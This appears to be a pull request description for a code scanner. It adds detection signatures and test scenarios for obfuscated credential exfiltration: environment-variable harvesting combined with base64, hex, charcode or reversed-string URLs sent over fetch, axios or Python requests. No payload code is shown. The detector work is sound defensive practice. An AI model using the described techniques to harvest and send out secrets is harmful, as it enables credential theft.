scanner: detect obfuscated credential exfiltration patterns

[yuliuyi717-ux]

Summary

• add new detector signatures for obfuscated exfiltration techniques:
  • base64-decoded URL literals
  • hex-escaped URL literals inside network calls
  • charcode URL construction
  • reversed-string URL decoding
  • concatenated URL assembly
• add correlated critical finding EXFIL_ENV_OBFUSCATED_TRANSMISSION when env harvesting + obfuscation + network transmission co-occur
• tighten sensitive file regex to avoid process.env false positives
• make allowlist matching non-stateful and keep it narrow

Test corpus (10 cases)

Added scanner/src/analyzer.obfuscation.test.ts with 10 malware-technique-oriented scenarios:

1. base64 URL decode + fetch
2. hex URL literal + fetch
3. charcode URL + axios
4. reversed string endpoint
5. concatenated endpoint
6. env harvest + base64 + reversed endpoint
7. python os.environ + base64.b64encode + requests.post
8. python os.environ + urllib3 + reversed endpoint slicing
9. negative: benign base64 binary decode
10. negative: benign axios API call

Verification

• cd scanner && npm test
• cd scanner && npm run build

Fixes #1

[vercel]

@yuliuyi717-ux is attempting to deploy a commit to the Rapi's projects Team on Vercel.

A member of the Team first needs to authorize it.